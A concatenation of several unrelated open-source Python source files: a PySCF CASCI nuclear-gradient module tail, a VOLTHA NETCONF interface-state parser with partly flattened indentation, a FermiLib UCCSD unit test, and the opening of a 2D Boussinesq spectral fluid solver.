                de[k,i] += numpy.einsum('ijkl,jk,il', eri1tmp, dm_core[q0:q1], casci_dm1[p0:p1])
                de[k,i] -= numpy.einsum('ijkl,lk,ij', eri1tmp, dm_cas[q0:q1], dm_core[p0:p1]) * 2
                de[k,i] += numpy.einsum('ijkl,jk,il', eri1tmp, dm_cas[q0:q1], dm_core[p0:p1])
            eri1 = eri1tmp = None

        # overlap-derivative (Pulay) terms
        de[k] -= numpy.einsum('xij,ij->x', s1[:,p0:p1], im1[p0:p1])
        de[k] -= numpy.einsum('xij,ji->x', s1[:,p0:p1], im1[:,p0:p1])

        de[k] -= numpy.einsum('xij,ij->x', s1[:,p0:p1], zeta[p0:p1]) * 2
        de[k] -= numpy.einsum('xij,ji->x', s1[:,p0:p1], zeta[:,p0:p1]) * 2

        de[k] -= numpy.einsum('xij,ij->x', s1[:,p0:p1], vhf_s1occ[p0:p1]) * 2
        de[k] -= numpy.einsum('xij,ji->x', s1[:,p0:p1], vhf_s1occ[:,p0:p1]) * 2

    log.timer('CASCI nuclear gradients', *time0)
    return de
def as_scanner(mcscf_grad, state=None):
    '''Generating a nuclear gradients scanner/solver (for geometry optimizer).

    The returned solver is a function. This function requires one argument
    "mol" as input and returns energy and first order nuclear derivatives.

    The solver will automatically use the results of last calculation as the
    initial guess of the new calculation. All parameters assigned in the
    nuc-grad object and SCF object (DIIS, conv_tol, max_memory etc) are
    automatically applied in the solver.

    Note scanner has side effects. It may change many underlying objects
    (_scf, with_df, with_x2c, ...) during calculation.

    Examples:

    >>> from pyscf import gto, scf, mcscf
    >>> mol = gto.M(atom='N 0 0 0; N 0 0 1.1', verbose=0)
    >>> mc_grad_scanner = mcscf.CASCI(scf.RHF(mol), 4, 4).nuc_grad_method().as_scanner()
    >>> etot, grad = mc_grad_scanner(gto.M(atom='N 0 0 0; N 0 0 1.1'))
    >>> etot, grad = mc_grad_scanner(gto.M(atom='N 0 0 0; N 0 0 1.5'))
    '''
    from pyscf import gto
    from pyscf.mcscf.addons import StateAverageMCSCFSolver
    if isinstance(mcscf_grad, lib.GradScanner):
        # already a scanner; return it unchanged
        return mcscf_grad
    if (state is not None and
        isinstance(mcscf_grad.base, StateAverageMCSCFSolver)):
        raise RuntimeError('State-Average MCSCF Gradients does not support '
                           'state-specific nuclear gradients.')

    logger.info(mcscf_grad, 'Create scanner for %s', mcscf_grad.__class__)

    class CASCI_GradScanner(mcscf_grad.__class__, lib.GradScanner):
        def __init__(self, g):
            lib.GradScanner.__init__(self, g)
        # `state=state` binds the outer argument at class-creation time
        def __call__(self, mol_or_geom, state=state, **kwargs):
            if isinstance(mol_or_geom, gto.Mole):
                mol = mol_or_geom
            else:
                mol = self.mol.set_geom_(mol_or_geom, inplace=False)
            if state is None:
                state = self.state

            mc_scanner = self.base
            # TODO: Check root flip
            e_tot = mc_scanner(mol)
            ci = mc_scanner.ci
            if isinstance(mc_scanner, StateAverageMCSCFSolver):
                e_tot = mc_scanner.e_average
            elif not isinstance(e_tot, float):
                # multi-root CASCI: pick out the requested state
                if state >= mc_scanner.fcisolver.nroots:
                    raise ValueError('State ID greater than the number of CASCI roots')
                e_tot = e_tot[state]
                # target at a specific state, to avoid overwriting self.state
                # in self.kernel
                ci = ci[state]

            self.mol = mol
            de = self.kernel(ci=ci, state=state, **kwargs)
            return e_tot, de
    return CASCI_GradScanner(mcscf_grad)
class Gradients(rhf_grad.GradientsBasics):
    '''Non-relativistic CASCI analytical nuclear gradients'''
    def __init__(self, mc):
        from pyscf.mcscf.addons import StateAverageMCSCFSolver
        if isinstance(mc, StateAverageMCSCFSolver):
            self.state = None  # not a specific state
        else:
            self.state = 0  # of which the gradients to be computed.
        rhf_grad.GradientsBasics.__init__(self, mc)

    def dump_flags(self, verbose=None):
        # Print solver settings (state selection, memory budget) to the log.
        log = logger.new_logger(self, verbose)
        log.info('\n')
        if not self.base.converged:
            log.warn('Ground state %s not converged', self.base.__class__)
        log.info('******** %s for %s ********',
                 self.__class__, self.base.__class__)
        if self.state is None:
            weights = self.base.weights
            log.info('State-average gradients over %d states with weights %s',
                     len(weights), weights)
        elif self.state != 0 and self.base.fcisolver.nroots > 1:
            log.info('State ID = %d', self.state)
        log.info('max_memory %d MB (current use %d MB)',
                 self.max_memory, lib.current_memory()[0])
        return self

    grad_elec = grad_elec

    def kernel(self, mo_coeff=None, ci=None, atmlst=None,
               state=None, verbose=None):
        """Compute total nuclear gradients (electronic + nuclear repulsion).

        Returns the (natm, 3) gradient array; also stored in self.de.
        """
        log = logger.new_logger(self, verbose)
        if ci is None: ci = self.base.ci
        if self.state is None:  # state average MCSCF calculations
            assert(state is None)
        elif isinstance(ci, (list, tuple, RANGE_TYPE)):
            # multi-root CASCI: select the CI vector of the requested state
            if state is None:
                state = self.state
            else:
                self.state = state
            ci = ci[state]
            log.info('Multiple roots are found in CASCI solver. '
                     'Nuclear gradients of root %d are computed.', state)

        if atmlst is None:
            atmlst = self.atmlst
        else:
            self.atmlst = atmlst

        if self.verbose >= logger.WARN:
            self.check_sanity()
        if self.verbose >= logger.INFO:
            self.dump_flags()

        de = self.grad_elec(mo_coeff, ci, atmlst, log)
        self.de = de = de + self.grad_nuc(atmlst=atmlst)
        if self.mol.symmetry:
            self.de = self.symmetrize(self.de, atmlst)
        self._finalize()
        return self.de

    # Initialize hcore_deriv with the underlying SCF object because some
    # extensions (e.g. x2c, QM/MM, solvent) modifies the SCF object only.
    def hcore_generator(self, mol=None):
        mf_grad = self.base._scf.nuc_grad_method()
        return mf_grad.hcore_generator(mol)

    # Calling the underlying SCF nuclear gradients because it may be modified
    # by external modules (e.g. QM/MM, solvent)
    def grad_nuc(self, mol=None, atmlst=None):
        mf_grad = self.base._scf.nuc_grad_method()
        return mf_grad.grad_nuc(mol, atmlst)

    def _finalize(self):
        # Pretty-print the final gradients at NOTE verbosity.
        if self.verbose >= logger.NOTE:
            if self.state is None:
                logger.note(self, '--------- %s gradients ----------',
                            self.base.__class__.__name__)
            else:
                logger.note(self, '--------- %s gradients for state %d ----------',
                            self.base.__class__.__name__, self.state)
            self._write(self.mol, self.de, self.atmlst)
            logger.note(self, '----------------------------------------------')

    as_scanner = as_scanner
Grad = Gradients  # backward-compatible alias

from pyscf import mcscf
# Expose the gradients class as a method on CASCI objects: mc.Gradients()
mcscf.casci.CASCI.Gradients = lib.class_as_method(Gradients)
if __name__ == '__main__':
    from pyscf import gto
    from pyscf import scf
    from pyscf import mcscf

    # Smoke test: check the analytical gradient against a stored
    # fingerprint and against a central finite difference of the energy.
    mol = gto.Mole()
    mol.atom = 'N 0 0 0; N 0 0 1.2; H 1 1 0; H 1 1 1.2'
    mol.build()
    mf = scf.RHF(mol).run(conv_tol=1e-14)
    mc = mcscf.CASCI(mf, 4, 4).run()
    g1 = mc.Gradients().kernel()
    print(lib.finger(g1) - -0.066025991364829367)

    mcs = mc.as_scanner()
    mol.set_geom_('N 0 0 0; N 0 0 1.201; H 1 1 0; H 1 1 1.2')
    e1 = mcs(mol)
    mol.set_geom_('N 0 0 0; N 0 0 1.199; H 1 1 0; H 1 1 1.2')
    e2 = mcs(mol)
    # d=0.002 Bohr-scaled displacement; compare dE/dz of atom 1
    print(g1[1,2], (e1-e2)/0.002*lib.param.BOHR)
| |
# Copyright 2017-present Adtran, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from twisted.internet.defer import inlineCallbacks, returnValue
import xmltodict
import structlog
from voltha.protos.openflow_13_pb2 import OFPPF_1GB_FD, OFPPF_10GB_FD, OFPPF_40GB_FD, OFPPF_100GB_FD
from voltha.protos.openflow_13_pb2 import OFPPF_FIBER, OFPPF_COPPER
from voltha.protos.openflow_13_pb2 import OFPPS_LIVE, OFPPC_PORT_DOWN, OFPPS_LINK_DOWN, OFPPF_OTHER
from voltha.protos.common_pb2 import OperStatus, AdminState
log = structlog.get_logger()
# NETCONF subtree filter: retrieve all configured ietf-interfaces entries
_ietf_interfaces_config_rpc = """
<filter xmlns="urn:ietf:params:xml:ns:netconf:base:1.0">
<interfaces xmlns="urn:ietf:params:xml:ns:yang:ietf-interfaces">
<interface/>
</interfaces>
</filter>
"""

# NETCONF subtree filter: retrieve operational state (admin/oper status,
# phys-address, speed, ...) for every interface
_ietf_interfaces_state_rpc = """
<filter xmlns="urn:ietf:params:xml:ns:netconf:base:1.0">
<interfaces-state xmlns="urn:ietf:params:xml:ns:yang:ietf-interfaces">
<interface>
<name/>
<type/>
<admin-status/>
<oper-status/>
<last-change/>
<phys-address/>
<speed/>
</interface>
</interfaces-state>
</filter>
"""
_allowed_with_default_types = ['report-all', 'report-all-tagged', 'trim', 'explicit']
# TODO: Centralize the item below as a function in a core util module
def _with_defaults(default_type=None):
if default_type is None:
return ""
assert(default_type in _allowed_with_default_types)
return """
<with-defaults xmlns="urn:ietf:params:xml:ns:yang:ietf-netconf-with-defaults">
{}</with-defaults>""".format(default_type)
class IetfInterfacesConfig(object):
    """Read ietf-interfaces *configuration* data over a NETCONF session."""

    def __init__(self, session):
        """
        :param session: this should be a netconf session
        """
        self._session = session

    @inlineCallbacks
    def get_config(self, source='running', with_defaults=None):
        # Issue a get for the interfaces subtree of the given datastore.
        # `with_defaults` is an optional RFC 6243 retrieval mode.
        filter = _ietf_interfaces_config_rpc + _with_defaults(with_defaults)
        request = self._session.get(source, filter=filter)
        rpc_reply = yield request
        returnValue(rpc_reply)

    def get_interfaces(self, rpc_reply, interface_type=None):
        """
        Get the physical entities of a particular type

        :param rpc_reply: Reply from previous get or request
        :param interface_type: (String or List) The type of interface (case-insensitive)
        :return: list) of OrderDict interface entries
        """
        result_dict = xmltodict.parse(rpc_reply.data_xml)
        # NOTE(review): this returns the 'interfaces' container while the
        # sibling state class drills into ['interfaces-state']['interface'];
        # confirm the expected reply shape with callers
        entries = result_dict['data']['interfaces']
        if interface_type is None:
            return entries

        # for entry in entries:
        #     import pprint
        #     log.info(pprint.PrettyPrinter(indent=2).pformat(entry))

        def _matches(entry, value):
            # match against the '#text' of the entry's 'type' node; accepts
            # a single string or a list of candidate strings
            if 'type' in entry and '#text' in entry['type']:
                text_val = entry['type']['#text'].lower()
                if isinstance(value, list):
                    return any(v.lower() in text_val for v in value)
                return value.lower() in text_val
            return False

        return [entry for entry in entries if _matches(entry, interface_type)]
class IetfInterfacesState(object):
    def __init__(self, session):
        # netconf session used to issue the state <get> requests
        self._session = session
    @inlineCallbacks
    def get_state(self):
        """Issue a NETCONF <get> for the interfaces-state subtree.

        :return: (deferred) rpc-reply carrying the operational interface data
        """
        try:
            request = self._session.get(_ietf_interfaces_state_rpc)
            rpc_reply = yield request
            returnValue(rpc_reply)
        except Exception as e:
            # log with traceback, then let the caller handle the failure
            log.exception('get_state', e=e)
            raise
@staticmethod
def get_interfaces(self, rpc_reply, key='type', key_value=None):
"""
Get the physical entities of a particular type
:param key_value: (String or List) The type of interface (case-insensitive)
:return: list) of OrderDict interface entries
"""
result_dict = xmltodict.parse(rpc_reply.data_xml)
entries = result_dict['data']['interfaces-state']['interface']
if key_value is None:
return entries
for entry in entries:
import pprint
log.info(pprint.PrettyPrinter(indent=2).pformat(entry))
def _matches(entry, key, value):
if key in entry and '#text' in entry[key]:
text_val = entry[key]['#text'].lower()
if isinstance(value, list):
return any(v.lower() in text_val for v in value)
return value.lower() in text_val
return False
return [entry for entry in entries if _matches(entry, key, key_value)]
@staticmethod
def _get_admin_state(entry):
state_map = {
'up': AdminState.ENABLED,
'down': AdminState.DISABLED,
'testing': AdminState.DISABLED
}
return state_map.get(entry.get('admin-status', 'down'),
AdminState.UNKNOWN)
@staticmethod
def _get_oper_status(entry):
state_map = {
'up': OperStatus.ACTIVE,
'down': OperStatus.FAILED,
'testing': OperStatus.TESTING,
'unknown': OperStatus.UNKNOWN,
'dormant': OperStatus.DISCOVERED,
'not-present': OperStatus.UNKNOWN,
'lower-layer-down': OperStatus.FAILED
}
return state_map.get(entry.get('oper-status', 'down'),
OperStatus.UNKNOWN)
@staticmethod
def _get_mac_addr(entry):
mac_addr = entry.get('phys-address', None)
if mac_addr is None:
import random
# TODO: Get with qumram team about phys addr
mac_addr = '08:00:{}{}:{}{}:{}{}:00'.format(random.randint(0, 9),
random.randint(0, 9),
random.randint(0, 9),
random.randint(0, 9),
random.randint(0, 9),
random.randint(0, 9))
return mac_addr
    @staticmethod
    def _get_speed_value(entry):
        """Return the interface speed in bps, deriving it from the
        interface name when the 'speed' leaf is absent."""
        speed = entry.get('speed') or IetfInterfacesState._get_speed_via_name(entry.get('name'))
        if isinstance(speed, str):
            # NOTE: `long` is Python 2 only; this module targets PY2
            return long(speed)
        return speed
@staticmethod
def _get_speed_via_name(name):
speed_map = {
'terabit': 1000000000000,
'hundred-gigabit': 100000000000,
'fourty-gigabit': 40000000000,
'ten-gigabit': 10000000000,
'gigabit': 1000000000,
}
for n,v in speed_map.iteritems():
if n in name.lower():
return v
return 0
    @staticmethod
    def _get_of_state(entry):
        # Map interface status to OpenFlow port state bits:
        #   If port up and ready: OFPPS_LIVE
        #   If port config bit is down: OFPPC_PORT_DOWN
        #   If port state bit is down: OFPPS_LINK_DOWN
        # if IetfInterfacesState._get_admin_state(entry) == AdminState.ENABLED:
        #     return OFPPS_LIVE \
        #         if IetfInterfacesState._get_oper_status(entry) == OperStatus.ACTIVE \
        #         else OFPPS_LINK_DOWN
        #
        # return OFPPC_PORT_DOWN
        # TODO: Update of openflow port state is not supported, so always say we are alive
        return OFPPS_LIVE
@staticmethod
def _get_of_capabilities(entry):
# The capabilities field is a bitmap that uses a combination of the following flags :
# Capabilities supported by the datapath
# enum ofp_capabilities {
# OFPC_FLOW_STATS = 1 << 0, /* Flow statistics. */
# OFPC_TABLE_STATS = 1 << 1, /* Table statistics. */
# OFPC_PORT_STATS = 1 << 2, /* Port statistics. */
# OFPC_GROUP_STATS = 1 << 3, /* Group statistics. */
# OFPC_IP_REASM = 1 << 5, /* Can reassemble IP fragments. */
# OFPC_QUEUE_STATS = 1 << 6, /* Queue statistics. */
# OFPC_PORT_BLOCKED = 1 << 8, /* Switch will block looping ports. */
# OFPC_BUNDLES = 1 << 9, /* Switch supports bundles. */
# OFPC_FLOW_MONITORING = 1 << 10, /* Switch supports flow monitoring. */
# }
# enum ofp_port_features {
# OFPPF_10MB_HD = 1 << 0, /* 10 Mb half-duplex rate support. */
# OFPPF_10MB_FD = 1 << 1, /* 10 Mb full-duplex rate support. */
# OFPPF_100MB_HD = 1 << 2, /* 100 Mb half-duplex rate support. */
# OFPPF_100MB_FD = 1 << 3, /* 100 Mb full-duplex rate support. */
# OFPPF_1GB_HD = 1 << 4, /* 1 Gb half-duplex rate support. */
# OFPPF_1GB_FD = 1 << 5, /* 1 Gb full-duplex rate support. */
# OFPPF_10GB_FD = 1 << 6, /* 10 Gb full-duplex rate support. */
# OFPPF_40GB_FD = 1 << 7, /* 40 Gb full-duplex rate support. */
# OFPPF_100GB_FD = 1 << 8, /* 100 Gb full-duplex rate support. */
# OFPPF_1TB_FD = 1 << 9, /* 1 Tb full-duplex rate support. */
# OFPPF_OTHER = 1 << 10, /* Other rate, not in the list. */
# OFPPF_COPPER = 1 << 11, /* Copper medium. */
# OFPPF_FIBER = 1 << 12, /* Fiber medium. */
# OFPPF_AUTONEG = 1 << 13, /* Auto-negotiation. */
# OFPPF_PAUSE = 1 << 14, /* Pause. */
# OFPPF_PAUSE_ASYM = 1 << 15 /* Asymmetric pause. */
# }
# TODO: Look into adtran-physical-entities and decode xSFP type any other settings
return IetfInterfacesState._get_of_speed(entry) | OFPPF_FIBER
@staticmethod
def _get_of_speed(entry):
speed = IetfInterfacesState._get_speed_value(entry)
speed_map = {
1000000000: OFPPF_1GB_FD,
10000000000: OFPPF_10GB_FD,
40000000000: OFPPF_40GB_FD,
100000000000: OFPPF_100GB_FD,
}
# return speed_map.get(speed, OFPPF_OTHER)
# TODO: For now, force 100 GB
return OFPPF_100GB_FD
@staticmethod
def _get_port_number(name, if_index):
import re
formats = [
'xpon \d/{1,2}\d', # OLT version 3 (Feb 2018++)
'Hundred-Gigabit-Ethernet \d/\d/{1,2}\d', # OLT version 2
'XPON \d/\d/{1,2}\d', # OLT version 2
'hundred-gigabit-ethernet \d/{1,2}\d', # OLT version 1
'channel-termination {1,2}\d', # OLT version 1
]
p2 = re.compile('\d+')
for regex in formats:
p = re.compile(regex, re.IGNORECASE)
match = p.match(name)
if match is not None:
return int(p2.findall(name)[-1])
    @staticmethod
    def get_port_entries(rpc_reply, port_type):
        """
        Get the port entries that make up the northbound and
        southbound interfaces

        :param rpc_reply: NETCONF response whose .data_xml carries an
                          ietf-interfaces 'interfaces-state' subtree
        :param port_type: substring used to select interfaces by name,
                          compared case-insensitively (e.g. 'xpon')
        :return: dict mapping port number -> port-info dict
        """
        ports = dict()
        result_dict = xmltodict.parse(rpc_reply.data_xml)
        entries = result_dict['data']['interfaces-state']['interface']
        # xmltodict yields a bare dict (not a list) when there is only a
        # single <interface> element.
        if not isinstance(entries, list):
            entries = [entries]
        port_entries = [entry for entry in entries if 'name' in entry and
                        port_type.lower() in entry['name'].lower()]
        for entry in port_entries:
            port = {
                # NOTE(review): 'ifindex' here vs 'ifIndex' below -- both
                # spellings cannot match the same XML key, so one of the
                # two lookups is very likely always None.  Confirm against
                # the device YANG / xmltodict output.
                'port_no': IetfInterfacesState._get_port_number(entry.get('name'),
                                                                entry.get('ifindex')),
                'name': entry.get('name', 'unknown'),
                'ifIndex': entry.get('ifIndex'),
                # 'label': None,
                'mac_address': IetfInterfacesState._get_mac_addr(entry),
                'admin_state': IetfInterfacesState._get_admin_state(entry),
                'oper_status': IetfInterfacesState._get_oper_status(entry),
                'ofp_state': IetfInterfacesState._get_of_state(entry),
                'ofp_capabilities': IetfInterfacesState._get_of_capabilities(entry),
                'current_speed': IetfInterfacesState._get_of_speed(entry),
                'max_speed': IetfInterfacesState._get_of_speed(entry),
            }
            port_no = port['port_no']
            # Entries that resolve to the same port number are merged,
            # with later fields refreshing earlier ones.
            if port_no not in ports:
                ports[port_no] = port
            else:
                ports[port_no].update(port)
        return ports
| |
# Copyright 2017 ProjectQ-Framework (www.projectq.ch)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module to test unitary coupled cluster operators."""
from __future__ import absolute_import
import unittest
from numpy.random import randn
import itertools
import fermilib
import fermilib.ops
from fermilib.ops import FermionOperator
import fermilib.utils
from fermilib.circuits._graph import (Graph, Node)
from fermilib.circuits._unitary_cc import *
from projectq.ops import (All, Measure, TimeEvolution,
QubitOperator, X)
class UnitaryCC(unittest.TestCase):
    """Tests for the unitary coupled cluster (UCCSD) operator builders.

    Covers anti-Hermiticity of the generated operators, an explicit
    reference build of the singlet operator, end-to-end H2 energy
    simulations through the ProjectQ Trotter engine (with and without a
    restricted qubit graph), and sparse numpy/list amplitude inputs.
    """
    def test_uccsd_anti_hermitian(self):
        """Test operators are anti-Hermitian independent of inputs"""
        test_orbitals = 4
        # Random dense amplitudes: singles are rank-2, doubles rank-4.
        single_amplitudes = randn(*(test_orbitals,) * 2)
        double_amplitudes = randn(*(test_orbitals,) * 4)
        generator = uccsd_operator(single_amplitudes, double_amplitudes)
        conj_generator = fermilib.ops.hermitian_conjugated(generator)
        # Anti-Hermitian generator: G == -G^dagger.
        self.assertTrue(generator.isclose(-1. * conj_generator))
    def test_uccsd_singlet_anti_hermitian(self):
        """Test that the singlet version is anti-Hermitian"""
        test_orbitals = 8
        test_electrons = 4
        packed_amplitude_size = uccsd_singlet_paramsize(test_orbitals,
                                                        test_electrons)
        packed_amplitudes = randn(int(packed_amplitude_size))
        generator = uccsd_singlet_operator(packed_amplitudes,
                                           test_orbitals,
                                           test_electrons)
        conj_generator = fermilib.ops.hermitian_conjugated(generator)
        self.assertTrue(generator.isclose(-1. * conj_generator))
    def test_uccsd_singlet_build(self):
        """Test a specific build of the UCCSD singlet operator"""
        initial_amplitudes = [-1.14941450e-08, 5.65340614e-02]
        n_orbitals = 4
        n_electrons = 2
        generator = uccsd_singlet_operator(initial_amplitudes,
                                           n_orbitals,
                                           n_electrons)
        # Expected operator written out term by term.
        test_generator = (0.0565340614 * FermionOperator("2^ 0 3^ 1") +
                          1.1494145e-08 * FermionOperator("1^ 3") +
                          0.0565340614 * FermionOperator("3^ 1 2^ 0") +
                          0.0565340614 * FermionOperator("2^ 0 2^ 0") +
                          1.1494145e-08 * FermionOperator("0^ 2") +
                          (-0.0565340614) * FermionOperator("1^ 3 0^ 2") +
                          (-1.1494145e-08) * FermionOperator("3^ 1") +
                          (-0.0565340614) * FermionOperator("1^ 3 1^ 3") +
                          (-0.0565340614) * FermionOperator("0^ 2 0^ 2") +
                          (-1.1494145e-08) * FermionOperator("2^ 0") +
                          0.0565340614 * FermionOperator("3^ 1 3^ 1") +
                          (-0.0565340614) * FermionOperator("0^ 2 1^ 3"))
        self.assertTrue(test_generator.isclose(generator))
    def test_simulation_energy(self):
        """Test UCCSD Singlet Energy for H2"""
        # Define H2 Hamiltonian inline
        hamiltonian = ((-0.0453222020986) * QubitOperator("X0 X1 Y2 Y3") +
                       (0.165867023964) * QubitOperator("Z0 Z3") +
                       (0.174348441706) * QubitOperator("Z2 Z3") +
                       (0.120544821866) * QubitOperator("Z0 Z2") +
                       (3.46944695195e-18) * QubitOperator("X0 Y1 X2 Y3") +
                       (0.165867023964) * QubitOperator("Z1 Z2") +
                       (0.171197748533) * QubitOperator("Z0") +
                       (-0.222785928901) * QubitOperator("Z3") +
                       (3.46944695195e-18) * QubitOperator("X0 X1 X2 X3") +
                       (0.168622191433) * QubitOperator("Z0 Z1") +
                       (0.120544821866) * QubitOperator("Z1 Z3") +
                       (3.46944695195e-18) * QubitOperator("Y0 Y1 Y2 Y3") +
                       (-0.0988639735178) * QubitOperator("") +
                       (0.171197748533) * QubitOperator("Z1") +
                       (0.0453222020986) * QubitOperator("Y0 X1 X2 Y3") +
                       (3.46944695195e-18) * QubitOperator("Y0 X1 Y2 X3") +
                       (-0.0453222020986) * QubitOperator("Y0 Y1 X2 X3") +
                       (-0.222785928901) * QubitOperator("Z2") +
                       (0.0453222020986) * QubitOperator("X0 Y1 Y2 X3"))
        hamiltonian.compress()
        compiler_engine = uccsd_trotter_engine()
        wavefunction = compiler_engine.allocate_qureg(4)
        test_amplitudes = [-1.14941450e-08, 5.65340614e-02]
        # Prepare the Hartree-Fock reference: occupy the first two qubits.
        for i in range(2):
            X | wavefunction[i]
        evolution_operator = uccsd_singlet_evolution(test_amplitudes, 4, 2)
        evolution_operator | wavefunction
        compiler_engine.flush()
        energy = compiler_engine.backend.get_expectation_value(hamiltonian,
                                                               wavefunction)
        # Deallocate cleanly before the engine is discarded.
        All(Measure) | wavefunction
        # Reference value presumably the H2 ground-state energy for this
        # Hamiltonian -- kept as the original regression constant.
        self.assertAlmostEqual(energy, -1.13727017463)
    def test_simulation_with_graph(self):
        """Test UCCSD Singlet Energy for H2 using a restricted qubit_graph"""
        # Define H2 Hamiltonian inline
        hamiltonian = ((-0.0453222020986) * QubitOperator("X0 X1 Y2 Y3") +
                       (0.165867023964) * QubitOperator("Z0 Z3") +
                       (0.174348441706) * QubitOperator("Z2 Z3") +
                       (0.120544821866) * QubitOperator("Z0 Z2") +
                       (3.46944695195e-18) * QubitOperator("X0 Y1 X2 Y3") +
                       (0.165867023964) * QubitOperator("Z1 Z2") +
                       (0.171197748533) * QubitOperator("Z0") +
                       (-0.222785928901) * QubitOperator("Z3") +
                       (3.46944695195e-18) * QubitOperator("X0 X1 X2 X3") +
                       (0.168622191433) * QubitOperator("Z0 Z1") +
                       (0.120544821866) * QubitOperator("Z1 Z3") +
                       (3.46944695195e-18) * QubitOperator("Y0 Y1 Y2 Y3") +
                       (-0.0988639735178) * QubitOperator("") +
                       (0.171197748533) * QubitOperator("Z1") +
                       (0.0453222020986) * QubitOperator("Y0 X1 X2 Y3") +
                       (3.46944695195e-18) * QubitOperator("Y0 X1 Y2 X3") +
                       (-0.0453222020986) * QubitOperator("Y0 Y1 X2 X3") +
                       (-0.222785928901) * QubitOperator("Z2") +
                       (0.0453222020986) * QubitOperator("X0 Y1 Y2 X3"))
        hamiltonian.compress()
        # Create a star graph of 4 qubits, all connected through qubit 0
        qubit_graph = Graph()
        compiler_engine = uccsd_trotter_engine(qubit_graph=qubit_graph)
        wavefunction = compiler_engine.allocate_qureg(4)
        for i in range(4):
            qubit_graph.add_node(Node(value=wavefunction[i].id))
        for i in range(1, 4):
            qubit_graph.add_edge(0, i)
        test_amplitudes = [-1.14941450e-08, 5.65340614e-02]
        # Prepare the Hartree-Fock reference: occupy the first two qubits.
        for i in range(2):
            X | wavefunction[i]
        evolution_operator = uccsd_singlet_evolution(test_amplitudes, 4, 2)
        evolution_operator | wavefunction
        compiler_engine.flush()
        energy = compiler_engine.backend.get_expectation_value(hamiltonian,
                                                               wavefunction)
        All(Measure) | wavefunction
        # Restricting connectivity must not change the computed energy.
        self.assertAlmostEqual(energy, -1.13727017463)
    def test_sparse_uccsd_operator_numpy_inputs(self):
        """Test numpy ndarray inputs to uccsd_operator that are sparse"""
        test_orbitals = 30
        # NOTE(review): bare `numpy` is not imported by this module (only
        # numpy.random.randn is); presumably the wildcard import from
        # fermilib.circuits._unitary_cc re-exports it -- confirm.
        sparse_single_amplitudes = numpy.zeros((test_orbitals, test_orbitals))
        sparse_double_amplitudes = numpy.zeros((test_orbitals, test_orbitals,
                                                test_orbitals, test_orbitals))
        sparse_single_amplitudes[3, 5] = 0.12345
        sparse_single_amplitudes[12, 4] = 0.44313
        sparse_double_amplitudes[0, 12, 6, 2] = 0.3434
        sparse_double_amplitudes[1, 4, 6, 13] = -0.23423
        generator = uccsd_operator(sparse_single_amplitudes,
                                   sparse_double_amplitudes)
        test_generator = (0.12345 * FermionOperator("3^ 5") +
                          (-0.12345) * FermionOperator("5^ 3") +
                          0.44313 * FermionOperator("12^ 4") +
                          (-0.44313) * FermionOperator("4^ 12") +
                          0.3434 * FermionOperator("0^ 12 6^ 2") +
                          (-0.3434) * FermionOperator("2^ 6 12^ 0") +
                          (-0.23423) * FermionOperator("1^ 4 6^ 13") +
                          0.23423 * FermionOperator("13^ 6 4^ 1"))
        self.assertTrue(test_generator.isclose(generator))
    def test_sparse_uccsd_operator_list_inputs(self):
        """Test list inputs to uccsd_operator that are sparse"""
        # Each entry is [[index, ...], amplitude].
        sparse_single_amplitudes = [[[3, 5], 0.12345],
                                    [[12, 4], 0.44313]]
        sparse_double_amplitudes = [[[0, 12, 6, 2], 0.3434],
                                    [[1, 4, 6, 13], -0.23423]]
        generator = uccsd_operator(sparse_single_amplitudes,
                                   sparse_double_amplitudes)
        test_generator = (0.12345 * FermionOperator("3^ 5") +
                          (-0.12345) * FermionOperator("5^ 3") +
                          0.44313 * FermionOperator("12^ 4") +
                          (-0.44313) * FermionOperator("4^ 12") +
                          0.3434 * FermionOperator("0^ 12 6^ 2") +
                          (-0.3434) * FermionOperator("2^ 6 12^ 0") +
                          (-0.23423) * FermionOperator("1^ 4 6^ 13") +
                          0.23423 * FermionOperator("13^ 6 4^ 1"))
        self.assertTrue(test_generator.isclose(generator))
| |
from __future__ import division
import numpy as np
from numpy import pi, exp, sqrt, cos, sin
import os
import h5py
try:
import pyfftw
pyfftw.interfaces.cache.enable()
except ImportError:
pass
class Boussinesq2d(object):
    """ 2D Boussinesq code in vorticity-streamfunction/buoyancy formulation.

    Integrates vorticity q and buoyancy b on a doubly periodic (x, z)
    domain pseudo-spectrally (real-to-complex FFT in x), stepping with a
    semi-implicit RK3W-theta scheme and either an exponential spectral
    filter or 2/3-rule dealiasing.
    """
    def __init__(
        # grid parameters
        self,
        nx = 128,
        nz=None,
        Lx=2*pi,
        Lz=None,
        # physical parameters
        nu = 0.,
        Fr = .1,
        R = 0.99,
        sig = 1.,
        ext_forc=False,
        kf = 4.,
        # timestepping parameters
        dt=.0025, # numerical timestep
        twrite=100, # interval for cfl and ke printout (in timesteps)
        tmax=100., # total time of integration
        filt=True, # spectral filter flag (NOTE: currently unused; see use_filter)
        use_fftw=True,
        ntd = 1, # number of threads for fftw
        # filter or dealiasing (False for 2/3 rule)
        use_filter=True,
        # saving parameters
        tsave=100, # interval to save (in timesteps)
        save_snapshots=True,
        overwrite=True,
        tsave_snapshots=100,
        path = 'output/'):
        """Set up grid, spectral operators, FFTs, time-stepper and output."""
        # Default to a square domain/grid.
        if nz is None: nz = nx
        if Lz is None: Lz = Lx
        # initialize parameters
        # domain
        self.nx = nx
        self.nz = nz
        self.Lx = Lx
        self.Lz = Lz
        self.dx = Lx/nx
        self.dz = Lz/nz
        self.x = np.arange(0.,Lx,self.dx)
        self.z = np.arange(0.,Lz,self.dz)
        self.x,self.z = np.meshgrid(self.x,self.z)
        # physical
        self.nu = nu
        self.Fr = Fr
        self.Fr2 = Fr**2
        self.R = R
        self.sig = sig
        self.kf = kf
        # ext forcing
        self.ext_forc = ext_forc
        # time related variables
        self.nmax = int(np.ceil(tmax/dt))
        self.dt = dt
        self.twrite = twrite
        self.tmax = tmax
        self.t = 0.
